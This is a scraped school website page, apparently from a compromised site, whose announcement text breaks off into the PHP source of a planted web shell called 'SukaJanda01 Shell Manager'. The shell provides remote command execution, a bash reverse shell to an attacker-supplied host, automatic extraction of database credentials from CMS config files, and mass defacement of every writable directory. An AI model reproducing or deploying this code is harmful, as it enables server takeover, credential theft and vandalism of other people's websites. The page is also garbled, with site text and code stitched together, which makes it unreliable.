• header

Selamat Datang di Website SMK VIP MAARIF NU 1 KEMIRI | Terima Kasih Kunjungannya.

Info Sekolah

PERKEMAHAN ALIH GOLONGAN

Tanggal : 05/10/2023
$file, 'path' => $fullPath, 'is_dir' => is_dir($fullPath), 'size' => is_file($fullPath) ? filesize($fullPath) : 0, 'perm' => substr(sprintf('%o', fileperms($fullPath)), -4), 'mtime' => filemtime($fullPath), 'writable' => is_writable($fullPath) ]; } } return $items; } function findConfigFiles($dir, &$results = []) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') { continue; } $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { findConfigFiles($path, $results); } else { $lower = strtolower($file); if (preg_match('/(wp-config.php|configuration.php|config.php|config.inc.php|settings.php|database.php|db.php|local.php|config.dist.php)/', $lower)) { $results[] = $path; } } } } // Extract DB credentials from config file content (for common CMS) function extractDBCredentials($content, $fileName = '') { $credentials = []; if (stripos($fileName, 'wp-config.php') !== false || strpos($content, "define('DB_NAME'") !== false) { // WordPress style preg_match("/define(s*'DB_NAME's*,s*'([^']+)'s*)/i", $content, $db); preg_match("/define(s*'DB_USER's*,s*'([^']+)'s*)/i", $content, $user); preg_match("/define(s*'DB_PASSWORD's*,s*'([^']*)'s*)/i", $content, $pass); preg_match("/define(s*'DB_HOST's*,s*'([^']+)'s*)/i", $content, $host); $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? '', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'CMS' => 'WordPress' ]; } elseif (stripos($fileName, 'configuration.php') !== false || strpos($content, '$dbtype') !== false) { preg_match("/publics+$users*=s*'([^']+)';/i", $content, $user); preg_match("/publics+$passwords*=s*'([^']*)';/i", $content, $pass); preg_match("/publics+$dbs*=s*'([^']+)';/i", $content, $db); preg_match("/publics+$hosts*=s*'([^']+)';/i", $content, $host); preg_match("/publics+$dbtypes*=s*'([^']+)';/i", $content, $type); if (!empty($user)) { $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? '', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'DB_TYPE' => $type[1] ?? '', 'CMS' => 'Joomla' ]; } } elseif (stripos($fileName, 'config.php') !== false || stripos($fileName, 'config.inc.php') !== false) { preg_match("/define(s*'DB_USERNAME's*,s*'([^']+)'s*)/i", $content, $user); preg_match("/define(s*'DB_PASSWORD's*,s*'([^']*)'s*)/i", $content, $pass); preg_match("/define(s*'DB_DATABASE's*,s*'([^']+)'s*)/i", $content, $db); preg_match("/define(s*'DB_HOSTNAME's*,s*'([^']+)'s*)/i", $content, $host); if (!empty($user)) { $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? '', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'CMS' => 'OpenCart/Other' ]; } } return $credentials; } // Try to bypass disable_functions and run command function runCommand($cmd) { $functions = ['system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open']; foreach ($functions as $func) { if (is_callable($func)) { $output = $func($cmd); if ($output !== null) return $output; } } return "Command execution not available."; } function rrmdir($dir) { if (!file_exists($dir)) return false; if (is_file($dir)) return unlink($dir); $objects = scandir($dir); foreach ($objects as $object) { if ($object != '.' && $object != '..') { $objPath = $dir . DIRECTORY_SEPARATOR . $object; if (is_dir($objPath)) rrmdir($objPath); else unlink($objPath); } } return rmdir($dir); } function extractArchive($file, $dest) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if ($ext === 'zip') { $zip = new ZipArchive; if ($zip->open($file) === true) { $zip->extractTo($dest); $zip->close(); return true; } } elseif (in_array($ext, ['tar', 'gz', 'tgz', 'tar.gz'])) { if (class_exists('PharData')) { try { $phar = new PharData($file); $phar->extractTo($dest, null, true); return true; } catch (Exception $e) { return false; } } } return false; } function massDeface($startDir, $defaceContent, &$writtenFiles = []) { $files = scandir($startDir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $startDir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { if (is_writable($path)) { file_put_contents($path . DIRECTORY_SEPARATOR . 'index.php', $defaceContent); $writtenFiles[] = $path . DIRECTORY_SEPARATOR . 'index.php'; } massDeface($path, $defaceContent, $writtenFiles); } } } function flatListDirs($dir, &$dirs=[]) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { $dirs[] = $path; flatListDirs($path, $dirs); } } } $action = $_REQUEST['action'] ?? ''; $path = $_REQUEST['path'] ?? getcwd(); $path = str_replace(['..', ""], '', $path); $msg = ''; $err = ''; if ($action === 'upload' && isset($_FILES['file'])) { $targetDir = safePath($_POST['upload_dir'] ?? getcwd(), $baseDir=__DIR__); if ($targetDir === false) $err = "Invalid upload directory"; else { $filename = basename($_FILES['file']['name']); $dest = $targetDir . DIRECTORY_SEPARATOR . $filename; if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) { $msg = "File uploaded to " . htmlspecialchars($dest); } else { $err = "Failed to upload file."; } } } if ($action === 'create') { $targetDir = safePath($_POST['target_dir'] ?? getcwd(), $baseDir=__DIR__); if ($targetDir === false) $err = "Invalid target directory"; else { $name = trim($_POST['name']); if ($name === '') { $err = "Name must not be empty."; } else { $safeName = basename($name); if ($_POST['type'] === 'folder') { $newFolder = $targetDir . DIRECTORY_SEPARATOR . $safeName; if (!file_exists($newFolder)) { if (mkdir($newFolder)) { $msg = "Folder created: " . htmlspecialchars($newFolder); } else { $err = "Failed to create folder."; } } else { $err = "Folder already exists."; } } else { $newFile = $targetDir . DIRECTORY_SEPARATOR . $safeName; if (!file_exists($newFile)) { if (file_put_contents($newFile, '') !== false) { $msg = "File created: " . htmlspecialchars($newFile); } else { $err = "Failed to create file."; } } else { $err = "File already exists."; } } } } } if ($action === 'rename' && isset($_POST['old']) && isset($_POST['new'])) { $old = safePath($_POST['old'], $baseDir=__DIR__); $newName = trim($_POST['new']); if ($old === false || empty($newName)) { $err = "Invalid paths for renaming"; } else { $new = safePath(dirname($_POST['old']) . DIRECTORY_SEPARATOR . basename($newName), $baseDir=__DIR__); if ($new === false) { $err = "Invalid new path for renaming."; } elseif (file_exists($new)) { $err = "A file or folder with the new name already exists."; } else { if (rename($old, $new)) { $msg = "Renamed successfully."; } else { $err = "Rename failed."; } } } } if ($action === 'delete' && isset($_POST['target'])) { $target = safePath($_POST['target'], $baseDir=__DIR__); if ($target === false) { $err = "Invalid delete path"; } else { if (is_dir($target)) { if (rrmdir($target)) { $msg = "Folder deleted"; } else { $err = "Failed to delete folder"; } } else { if (unlink($target)) { $msg = "File deleted"; } else { $err = "Failed to delete file"; } } } } if ($action === 'chmod' && isset($_POST['target']) && isset($_POST['perm'])) { $target = safePath($_POST['target'], $baseDir=__DIR__); $perm = $_POST['perm']; if ($target === false || !preg_match('/^[0-7]{3,4}$/', $perm)) { $err = "Invalid chmod parameters"; } else { if (chmod($target, octdec($perm))) { $msg = "Permission changed to $perm"; } else { $err = "Failed to change permission"; } } } if ($action === 'edit-save' && isset($_POST['file']) && isset($_POST['content'])) { $file = safePath($_POST['file'], $baseDir=__DIR__); if ($file === false) { $err = "Invalid file path"; } else { $content = $_POST['content']; if (file_put_contents($file, $content) !== false) { $msg = "File saved successfully"; } else { $err = "Failed to save file"; } } } if ($action === 'backconnect' && isset($_POST['host']) && isset($_POST['port'])) { $host = $_POST['host']; $port = intval($_POST['port']); $cmd = "bash -i >& /dev/tcp/$host/$port 0>&1"; $backconnect_res = runCommand($cmd); $msg = "Backconnect command run. Result: " . htmlspecialchars(substr($backconnect_res, 0, 300)); } $base64decoded = ''; if ($action === 'base64decode' && isset($_POST['base64text'])) { $base64decoded = base64_decode($_POST['base64text'], true); if ($base64decoded === false) { $err = "Invalid base64 string"; } } $dbExtractions = []; if ($action === "dbextract") { $configs = []; findConfigFiles(getcwd(), $configs); foreach ($configs as $configFile) { $content = @file_get_contents($configFile); if ($content !== false) { $creds = extractDBCredentials($content, basename($configFile)); if (!empty($creds)) { $creds['File'] = $configFile; $dbExtractions[] = $creds; } } } if (empty($dbExtractions)) { $err = "No database credentials found!"; } } if ($action === 'extractbackup' && isset($_POST['backupfile'])) { $backupfile = safePath($_POST['backupfile'], $baseDir=__DIR__); $extractto = dirname($backupfile) . DIRECTORY_SEPARATOR . 'extracted_' . time(); if ($backupfile === false || !file_exists($backupfile)) { $err = "Invalid backup file"; } else { if (!file_exists($extractto)) mkdir($extractto, 0755, true); if (extractArchive($backupfile, $extractto)) { $msg = "Backup extracted to $extractto"; } else { $err = "Failed to extract backup"; } } } $massDefaceResult = ''; if ($action === 'massdeface' && isset($_POST['defacecontent'])) { $defaceContent = $_POST['defacecontent']; $writtenFiles = []; massDeface(getcwd(), $defaceContent, $writtenFiles); if (!empty($writtenFiles)) { $massDefaceResult = implode("
", array_map('htmlspecialchars', $writtenFiles)); $msg = "Mass deface done in " . count($writtenFiles) . " directories"; } else { $err = "No writable directories found for mass deface"; } } $items = listDir($path); $editFilePath = ''; $editFileContent = ''; if ($action === 'edit' && isset($_GET['file'])) { $editFilePath = safePath($_GET['file'], $baseDir=__DIR__); if ($editFilePath !== false && is_file($editFilePath)) { $editFileContent = file_get_contents($editFilePath); } else { $err = "Invalid file for editing."; $editFilePath = ''; } } if ($action === 'download' && isset($_GET['file'])) { $downloadFile = safePath($_GET['file'], $baseDir=__DIR__); if ($downloadFile !== false && is_file($downloadFile)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($downloadFile) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($downloadFile)); flush(); readfile($downloadFile); exit; } else { $err = "Invalid file for download."; } } ?> SukaJanda01 Shell Manager

SukaJanda01 Shell Manager

File Manager - Listing:

NameTypeSizePermissionsModifiedWritableActions
.. (Parent Directory)
".htmlspecialchars($item['name']).""; else: echo "📄 ".htmlspecialchars($item['name']).""; endif; ?> ✏️  
 
 

Upload File & Create

Upload File

Create New File or Folder

Editing File:


Backconnect / Reverse Shell via Netcat

Base64 Decoder

Decoded Output:

Automatic Database Credentials Extraction

Found Database Configurations:

CMSFileDB NameUserPasswordHost

No database credentials found.

Backup Extractor

Mass Deface

Files Written:

Page not found.

© Shell Crocodile • SukaJanda01.inc



Kembali ke Atas

Info Sekolah Lainnya :

Setup by Website Sekolah Gratis.